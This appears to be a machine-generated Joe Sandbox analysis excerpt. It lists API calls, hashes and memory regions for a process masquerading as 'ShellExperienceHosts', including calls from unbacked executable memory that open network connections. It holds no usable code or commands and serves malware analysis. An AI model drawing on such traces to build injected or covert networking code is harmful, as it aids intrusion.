                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Create$CompatibleSelect$H_prolog3_Section
                                                                            • String ID:
                                                                            • API String ID: 1338481308-0
                                                                            • Opcode ID: 1adbd339161c63c6205553fe5e2fc93f9f2a7dfb68081cb158a6a4ba11fc74f5
                                                                            • Instruction ID: ce7035e0ba196f75a570ca6c38ea4c8a691e3cdda9a431c3e5a4678f2411daea
                                                                            • Opcode Fuzzy Hash: 1adbd339161c63c6205553fe5e2fc93f9f2a7dfb68081cb158a6a4ba11fc74f5
                                                                            • Instruction Fuzzy Hash: 0CA13970A00615DFEB65CF64CD84B9AB7B5BF09304F1081A9E85DE7651EB30AE89CF60
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7BA9D9
                                                                            • EqualRect.USER32(?,?), ref: 6C7BAA03
                                                                            • MonitorFromPoint.USER32(?,00000000,00000002), ref: 6C7BAB7D
                                                                            • GetMonitorInfoW.USER32(00000000), ref: 6C7BAB84
                                                                              • Part of subcall function 6C6E2190: SelectObject.GDI32(?,00000000), ref: 6C6E21B0
                                                                              • Part of subcall function 6C6E2190: SelectObject.GDI32(?,00000000), ref: 6C6E21C6
                                                                              • Part of subcall function 6C6FAE84: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 6C6FAE99
                                                                            • CopyRect.USER32(00000000,?), ref: 6C7BAB96
                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000004,6C8F37B0,?,?,?,6C70CE98,00000210), ref: 6C7BAC54
                                                                            • UpdateWindow.USER32(00000000), ref: 6C7BAC5D
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 6C7BAC6F
                                                                            • SetCursor.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6C7BAC76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CursorMonitorObjectSelect$CopyEqualExtentFromH_prolog3_InfoInvalidateLoadPointPoint32TextUpdateWindow
                                                                            • String ID: (
                                                                            • API String ID: 3592845343-3887548279
                                                                            • Opcode ID: d250131bf369e3f55f2eb477b081c80e77fa42454f1498e6ad8673b6e752c098
                                                                            • Instruction ID: fad1cf24cb9c34ee05cb5adddc33e2d474abca7aaf485c6b2b8a2c8ddb171e0a
                                                                            • Opcode Fuzzy Hash: d250131bf369e3f55f2eb477b081c80e77fa42454f1498e6ad8673b6e752c098
                                                                            • Instruction Fuzzy Hash: F2917371A0020A9FDF00DFA8CA48ADE77B5FF49318F148129E915BB644DB70AD45CFA4
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C708E99
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                              • Part of subcall function 6C70C950: GetStockObject.GDI32(00000011), ref: 6C70C95F
                                                                              • Part of subcall function 6C70C950: SelectObject.GDI32(?,?), ref: 6C70C971
                                                                            • GetTextMetricsW.GDI32(?,?), ref: 6C708ED3
                                                                            • GetClientRect.USER32(00000000,00000000), ref: 6C708EFA
                                                                            • GetStockObject.GDI32(00000011), ref: 6C708F40
                                                                            • SendMessageW.USER32(?,00000030,?,00000000), ref: 6C708F4E
                                                                            • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6C708FC4
                                                                            • SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6C708FFE
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C709037
                                                                            • GetSystemMetrics.USER32(00000015), ref: 6C70909A
                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000014), ref: 6C709133
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$MessageSend$MetricsSelectStock$ClientH_prolog3H_prolog3_RectRedrawSystemTextWindow
                                                                            • String ID: (>
                                                                            • API String ID: 591413167-2014128029
                                                                            • Opcode ID: 9407bb7289892f0a7fd409e0740ca610c03e318059f19c78a1e373b62c8487c1
                                                                            • Instruction ID: 56c776a2ef7bf45c6a89b2a11478e4b1b2a3201c38c213696005b7cb2212f624
                                                                            • Opcode Fuzzy Hash: 9407bb7289892f0a7fd409e0740ca610c03e318059f19c78a1e373b62c8487c1
                                                                            • Instruction Fuzzy Hash: A1818A70B002149FDF159F64C998BEE77B6BF49309F1801B8ED0AAB396DB71A905CB50
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718D26
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: %TsMFCToolBarParameters$CommandsUsage$LargeIcons$MFCToolBars$MenuAnimation$MenuShadows$RecentlyUsedMenus$ShortcutKeys$ShowAllMenusAfterDelay$Tooltips
                                                                            • API String ID: 431132790-4024198107
                                                                            • Opcode ID: 2b24ee2222d811197a92fb0f39a1d093d934463bf9d11dc5f77e1b23cd8df176
                                                                            • Instruction ID: 7cbe8b58e4b2cce13ab1868f838f55989e133b6368f2ff2cbcef0d9951073fa4
                                                                            • Opcode Fuzzy Hash: 2b24ee2222d811197a92fb0f39a1d093d934463bf9d11dc5f77e1b23cd8df176
                                                                            • Instruction Fuzzy Hash: 9D5183717002059FDF149F64CA84EBD7BB6AF89348B150A78E412EBB45CB34E909DB91
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718F07
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: %TsMFCToolBarParameters$CommandsUsage$LargeIcons$MFCToolBars$MenuAnimation$MenuShadows$RecentlyUsedMenus$ShortcutKeys$ShowAllMenusAfterDelay$Tooltips
                                                                            • API String ID: 431132790-4024198107
                                                                            • Opcode ID: 0cd3bc2aec289d4922ea1557a37c767e9cfdff2208e6b66421f850941e4c5628
                                                                            • Instruction ID: cc22ae2605283666afa2df3621adad37ea8eafdd2e17058250f536d586bb807e
                                                                            • Opcode Fuzzy Hash: 0cd3bc2aec289d4922ea1557a37c767e9cfdff2208e6b66421f850941e4c5628
                                                                            • Instruction Fuzzy Hash: 74518C71B002069FDF109BA4C984DBD7772AFCA3487190938E812ABB95CB36DC06DB95
                                                                            APIs
                                                                              • Part of subcall function 6C7BEB3B: LoadCursorW.USER32(00000000,00007F8B), ref: 6C7BEB53
                                                                              • Part of subcall function 6C7BEB3B: LoadCursorW.USER32(?,00007901), ref: 6C7BEB70
                                                                            • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 6C7BE95E
                                                                            • PostMessageW.USER32(?,00000111,0000E145,?), ref: 6C7BE9DA
                                                                            • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 6C7BE9FF
                                                                            • GetCursorPos.USER32(?), ref: 6C7BEA19
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6C7BEA45
                                                                            • ReleaseCapture.USER32 ref: 6C7BEA9C
                                                                            • SetCapture.USER32(?), ref: 6C7BEAA5
                                                                            • ReleaseCapture.USER32 ref: 6C7BEAB1
                                                                            • SendMessageW.USER32(?,00000362,?,00000000), ref: 6C7BEAC3
                                                                            • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 6C7BEB03
                                                                            • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C7BEB30
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                                            • String ID:
                                                                            • API String ID: 291007519-0
                                                                            • Opcode ID: c46ef60ab7614f70ab228c1716905c117b2e87d848301fcb194b641b0cf337f2
                                                                            • Instruction ID: 40b2c2adcc257f144a5f40a942c4742af5cfbfc7fdf4a530c268b8aefc9282c5
                                                                            • Opcode Fuzzy Hash: c46ef60ab7614f70ab228c1716905c117b2e87d848301fcb194b641b0cf337f2
                                                                            • Instruction Fuzzy Hash: 60514E71A00219EBDF119F65C989EAE7B79FF8A705F1001B9F916AB795C730A900CB90
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 022336E7
                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02233720
                                                                            • WSACreateEvent.WS2_32 ref: 02233752
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 02233764
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 02233770
                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 0223378F
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 0223379B
                                                                            • gethostbyname.WS2_32(00000000), ref: 022337A9
                                                                            • htons.WS2_32(?), ref: 022337CF
                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 022337ED
                                                                            • connect.WS2_32(?,?,00000010), ref: 02233802
                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 02233811
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            • API String ID: 1463362053-0
                                                                            • Opcode ID: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                            • Instruction ID: f6f2473cb8a4d828b928b55227818bde9a7a3c946174ef070c15d72a4d661bdc
                                                                            • Opcode Fuzzy Hash: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                            • Instruction Fuzzy Hash: 5D417CB1A10205ABE721DBA4CC89F7EB7B8FB48711F108519FA119A2D0D771A904CBA4
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AA73
                                                                            • SysAllocString.OLEAUT32(PropertyList), ref: 6C70AABD
                                                                              • Part of subcall function 6C6B4DCE: FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                              • Part of subcall function 6C6B4DCE: LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                              • Part of subcall function 6C6B4DCE: LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                              • Part of subcall function 6C6B4DCE: SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AB8E
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C70ABD6
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AC0E
                                                                            • SysAllocString.OLEAUT32(PropertyList), ref: 6C70AC40
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C70AC6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocResourceString$H_prolog3$FindLoadLockSizeof
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2705467776-1939653111
                                                                            • Opcode ID: 06c4718afd45446e43fd595b27f2207767ceb16ef14462fa8955e0f10151b654
                                                                            • Instruction ID: 2c71a1f9c62b1d7e2666ba514226b0dd2432a2a71f4fd80aeba1e58ed9be1063
                                                                            • Opcode Fuzzy Hash: 06c4718afd45446e43fd595b27f2207767ceb16ef14462fa8955e0f10151b654
                                                                            • Instruction Fuzzy Hash: A071D1B0B0020ADBDF10DF64CA48BEEB7F5BF04728F148529E9219BA80DB70D954CB95
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7D6B09
                                                                            • GetObjectW.GDI32(00000004,00000018,?), ref: 6C7D6B20
                                                                              • Part of subcall function 6C7D6A5F: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C7D6AD6
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7D6BA0
                                                                            • SelectObject.GDI32(?,00000004), ref: 6C7D6BB3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7D6BD1
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6BE6
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C7D6C05
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6C13
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6C1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$Create$Compatible$H_prolog3Section
                                                                            • String ID:
                                                                            • API String ID: 2431383920-3916222277
                                                                            • Opcode ID: c675f9baaaab34fd0f71d4c98df47ed40ed360cfb1c176ef0a0bd7756674ff64
                                                                            • Instruction ID: 600cc5b37f8569e414104fb210ffeea636b3dc316f17d3956c60cb2748e56e69
                                                                            • Opcode Fuzzy Hash: c675f9baaaab34fd0f71d4c98df47ed40ed360cfb1c176ef0a0bd7756674ff64
                                                                            • Instruction Fuzzy Hash: 2E41BF32D01119AFDB11CFE4DE48AEEBB75FF49308F118429E414A7690DB71AE09CBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$FreeVirtual
                                                                            • String ID: !jWW$.$_$i$l${vU_
                                                                            • API String ID: 974088968-3065862289
                                                                            • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                            • Instruction ID: e841c6b73f9d3711f5ee1507c293e790da8ac6c295b3382047dc3603370ad386
                                                                            • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                            • Instruction Fuzzy Hash: 94218DB4A403589FD721DF94CC84FAABBB9FF85700F0481CAE54CAA644D7B09A84CF52
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F2983
                                                                            • GetParent.USER32(?), ref: 6C6F298C
                                                                            • IsZoomed.USER32(?), ref: 6C6F29F7
                                                                            • SetWindowRgn.USER32 ref: 6C6F2A79
                                                                            • GetClientRect.USER32(?,?), ref: 6C6F2A9E
                                                                            • GetClientRect.USER32(?,?), ref: 6C6F2AB2
                                                                              • Part of subcall function 6C6E2D69: ClientToScreen.USER32(?,?), ref: 6C6E2D78
                                                                              • Part of subcall function 6C6E2D69: ClientToScreen.USER32(?,?), ref: 6C6E2D85
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F2AD1
                                                                              • Part of subcall function 6C770C53: SetWindowPos.USER32(?,?,?,0000000A,0000000A,00000000,6C6B1806,?,?,6C6B1806,00000000,0000000A,0000000A,?,?,00000014), ref: 6C770C7B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectWindow$Screen$ParentZoomed
                                                                            • String ID:
                                                                            • API String ID: 2235899813-0
                                                                            • Opcode ID: bc7330d5cc18bc160fe44cf1dd5ec3b0215dc66ebf85fba9545c43742c3d26ae
                                                                            • Instruction ID: 18025109380166608b1430db0f557c3c88366081579b66c6c1f3b38ea9f57d8a
                                                                            • Opcode Fuzzy Hash: bc7330d5cc18bc160fe44cf1dd5ec3b0215dc66ebf85fba9545c43742c3d26ae
                                                                            • Instruction Fuzzy Hash: B2B14D71B0160AAFDF08DF64C958BFEB7B6BF49308F150128E915A7650DB30AD52CB98
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$swprintf$_malloc
                                                                            • String ID:
                                                                            • API String ID: 1873853019-0
                                                                            • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                            • Instruction ID: ef08b7d352c198112f69df0b33e4d19127cad8783f90109a3b2311d4d51b8846
                                                                            • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                            • Instruction Fuzzy Hash: C981D4B9940700BBE720EF58EC85F6B77A4AF4C311F1841A4ED195F382EB71E911C6A6
                                                                            APIs
                                                                            • PtInRect.USER32(?,?,00000000), ref: 6C754A81
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105,?,?,?,?,?,00000000), ref: 6C754AA4
                                                                            • ClientToScreen.USER32(?,?), ref: 6C754AD7
                                                                            • WindowFromPoint.USER32(?,?), ref: 6C754AE3
                                                                            • ReleaseCapture.USER32 ref: 6C754AFA
                                                                            • SetCapture.USER32(?), ref: 6C754B92
                                                                            • ReleaseCapture.USER32 ref: 6C754BC0
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C754BFD
                                                                            • UpdateWindow.USER32(?), ref: 6C754C06
                                                                            • ClientToScreen.USER32(?,?), ref: 6C754D28
                                                                            • SetCursorPos.USER32(?,?), ref: 6C754D34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureWindow$ClientRectReleaseScreen$CursorFromInvalidatePointRedrawUpdate
                                                                            • String ID:
                                                                            • API String ID: 1209641013-0
                                                                            • Opcode ID: b7ecf36b1ec04b8a61ae9c99b3a7066c6b73eaee2fcc9f1fe7caa1753d87f25d
                                                                            • Instruction ID: ff4f1056b8866467930c6b3943767396935c4f4ec2671b1d64439263c20b13b4
                                                                            • Opcode Fuzzy Hash: b7ecf36b1ec04b8a61ae9c99b3a7066c6b73eaee2fcc9f1fe7caa1753d87f25d
                                                                            • Instruction Fuzzy Hash: 83A15E71B00616AFDF09DF64C988BBDB7B5BF48318F140269E92693290DF30A961DBD1
APIs
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
